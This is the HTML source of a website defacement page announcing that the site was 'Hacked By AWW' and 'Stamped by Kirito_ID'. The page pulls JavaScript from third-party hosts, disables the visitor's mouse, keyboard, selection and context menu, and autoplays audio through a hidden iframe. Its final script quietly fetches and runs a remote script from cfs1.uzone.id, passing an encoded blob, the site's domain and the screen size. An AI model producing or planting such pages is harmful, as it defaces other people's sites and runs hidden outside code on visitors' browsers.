<html>
<script>
alert("Just enjoy the music...")
alert("AWW from OoSTAnime")
</script>
<head>
<title>AWW | OoSTAnime</title>
<body bgcolor="black">
<script src='http://yourjavascript.com/1171704334/efek-salju-faisal.js' type='text/javascript'/></script>
<script type="text/javascript">if (typeof document.onselectstart!="undefined") {document.onselectstart=new Function ("return false");}else{document.onmousedown=new Function ("return false");document.onmouseup=new Function ("return true");}
</body>
	<meta property="og:image" content="https://i.pinimg.com/originals/62/f0/ef/62f0ef2245a7e536ef9ee39cac362378.gif">
	<link rel="SHORTCUT ICON" href="http://i66.tinypic.com/2ngse43.png" type="image/png">
	<meta name="google-site-verification" content="Stamped by AWW"/>
	<meta name="Author" content="Hacked By AWW"/>
	<meta name="copyright" content="www.oostanime.blogspot.com"/>
	<meta name="description" content="This site has been Hacked by AWW feat. OoSTAnime"/>
	<meta http-equiv="Content-Language" content="en-us">
	<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
	<link href="http://fonts.googleapis.com/css?family=Abel" rel="stylesheet" type="text/css"/>
    <link href="http://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css"/>
    <link href="http://fonts.googleapis.com/css?family=Orbitron" rel="stylesheet" type="text/css"/>
    <link href='http://fonts.googleapis.com/css?family=Abel:700' rel='stylesheet' type='text/css'>
    <link href='http://fonts.googleapis.com/css?family=Abel:400' rel='stylesheet' type='text/css'>
    <style>
body { background:url('http:/`/jindalelec.co.ke/691916.png') black;background-size: cover;background-attachment: fixed;
color:white;
font-family: Orbitron !important;
}
#unknown{font-family:Palatino;}
.unknown{background:-webkit-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba(0,0,0,0.7));background:-moz-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba(0,0,0,0.7));background:-ms-radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba(0,0,0,0.7));background:radial-gradient(rgba(0,0,0,0.1),rgba(0,0,0,0.3) 50%,rgba(0,0,0,0.7))}
a {
color:green;
  text-decoration: none;
  cursor:pointer;
}
a:hover { color:orange;}


.type-wrap{
	margin:10px auto;
	padding:20px;
	}

	.grp {
		color: white;
		font-size: 72px;
		text-shadow: 0px 0px 8px red,0px 0px 8px red;
		}
#rotate {
	  -webkit-animation: rotatePositive 5s infinite linear;
	  -moz-animation: rotatePositive 5s infinite linear;
	  -ms-animation: rotatePositive 5s infinite linear;
	  -o-animation: rotatePositive 5s infinite linear;
	  animation: rotatePositive 5s infinite linear;
		}

  @-webkit-keyframes rotatePositive {
      0% { -webkit-transform: rotatey(0deg); }
      100% { -webkit-transform: rotatey(360deg); }
  }

  @-moz-keyframes rotatePositive {
      0% { -moz-transform: rotatey(0deg); }
      100% { -moz-transform: rotatey(360deg); }
  }

  @-ms-keyframes rotatePositive {
      0% { -ms-transform: rotatey(0deg); }
      100% { -ms-transform: rotatey(360deg); }
  }

  @-o-keyframes rotatePositive {
      0% { -o-transform: rotatey(0deg); }
      100% { -o-transform: rotatey(360deg); }
  }

  @keyframes rotatePositive {
      0% { transform: rotatey(0deg); }
      100% { transform: rotatey(360deg); }
  }
  	#blink {text-decoration:blink;
-webkit-animation-name: blink; 
-webkit-animation-iteration-count: infinite; 
-webkit-animation-timing-function: cubic-bezier(1.0,0,0,1.0);
-webkit-animation-duration: 1s;
}
.typed-cursor{
            opacity: 1;
            font-weight: 100;
            -webkit-animation: blink 0.7s infinite;
            -moz-animation: blink 0.7s infinite;
            -ms-animation: blink 0.7s infinite;
            -o-animation: blink 0.7s infinite;
            animation: blink 0.7s infinite;
        }
        @-keyframes blink{
            0% { opacity:1; }
            50% { opacity:0; }
            100% { opacity:1; }
        }
        @-webkit-keyframes blink{
            0% { opacity:1; }
            50% { opacity:0; }
            100% { opacity:1; }
        }
        @-moz-keyframes blink{
            0% { opacity:1; }
            50% { opacity:0; }
            100% { opacity:1; }
        }
        @-ms-keyframes blink{
            0% { opacity:1; }
            50% { opacity:0; }
            100% { opacity:1; }
        }
        @-o-keyframes blink{
            0% { opacity:1; }
            50% { opacity:0; }
            100% { opacity:1; }
        }
#plate{
  position: absolute;!important;
    top:0!important;
   
    left:0!important;
 width:100%;
 height:100%;
    overflow:hidden!important;
    z-index:-1!important;
    margin:0;
    padding:0;
    position:fixed;
    opacity:0.6;
}

.hackBody{
  min-height:550px;
}

.container
{
margin-top:10px;
}
    </style>
</head>
<script src="http://sites.google.com/site/amatullah83/js-indahnyaberbagi/bintang.hijau.js" type="text/javascript"></script>
<body oncontextmenu='return false' onkeydown='return false' onmousedown='return false'>
<div align="center">
<div class="container">
	<div class="hackBody"> 
	<div id="plate"> 
	</div>
<center><br><br><br><br>
    <a href="#"><img src="http://38.media.tumblr.com/2e7b74cc55f9f34962ba3b5f83386275/tumblr_mvyt45BVYK1r0tytoo1_400.gif" width="20%"></a><br>
    <div class="h1"><font size="12px" style="font-family: Iceberg, sans-serif;color:black;text-shadow: 0 0 3px red, 0px 0px 5px red"><b>Error <font style="font-family: Iceberg, sans-serif;color:white;text-shadow: 0 0 3px red, 0px 0px 5px red" >Violence</font></b></div></font><br>
    <div class="h2"><font size="6px"><b>[<span style="color:red ; text-shadow: #000 3px 3px 5px">!</span>] <span style="color:aqua;">Stamped by <span style="color:red ; text-shadow: #000 3px 3px 5px">Kirito_ID</b><b>[<span style="color:red ; text-shadow: #000 3px 3px 5px">!</span>]</div></font>
    </center>
<ul class="cbdb-menu">
</ul>       
	<div class="h4"><font color="white">-:-</font><b style="color:gold;text-shadow: 0 0 3px red, 0px 0px 5px red;">Shootz:</b><font color="white">-:-</font></div>
    <center>
<font size="5px" style="font-family: Iceberg, sans-serif;color:white;text-shadow: 0 0 3px red, 0px 0px 5px red;width:50%;" >GOMBRUS - ./v17</font><br>
<center><br>
<iframe width="1" height="1" src="https://www.youtube.com/embed/GfqcOXksw_U?autoplay=1&list=PLLjmxLK8T7PxEm-_dyDk2QgLAPTTMjhk3&loop=1&volume=150" frameborder="0" allowfullscreen></iframe>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKFc%2fqkUjPaJRk0uOjOpQ7Y%2f6YGQwjytJZasaORRGw8ADtatmEFZsUcqs4oFldYeh84zMhJ5AJ7CRMkwKcVKcVmkb0o9GDTa3%2fFj6S7mo0v2MAWAhyfpWHi7hzgmSjiB3TP0YiXlQcE2pN56XBFmT%2fOoasnUsJe3f3UfCPUqDsfjt2kzotrHt2Lkrw3aL8%2bZDMwtYIzJa%2b1LOFM%2bGJcGmIjMEgc90e0uuM4aHoqE3Mfp%2fe2HIWH2CTvdBlKBdEa6Vf5GWrzLhaMogkZ9IXGQWW%2blXC6irHsroiKmlqw4hP3yKZplKsMu69t%2fm%2fnd2E%2bwzMPnzB39P9QOZqfolrp2%2f9wnp4VcqFHUov76LMBXzwYVfb2%2bwfB42SG3QJewdfrHAsseXJ%2b9CghedYz6HOFxC7AM795c15y%2frYRTWf%2fo%2fdybpEX8n41T7D170dc9O7Dc0V3NoHR8Rtuznf75YZWYm7j%2f0dstuBCHtGdB%2b7Pexel9CZTTR%2fakWcOWCve%2fdOrc4S0ETEunc%2fkiDKDOQTJack9v75NC7MxFVt" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
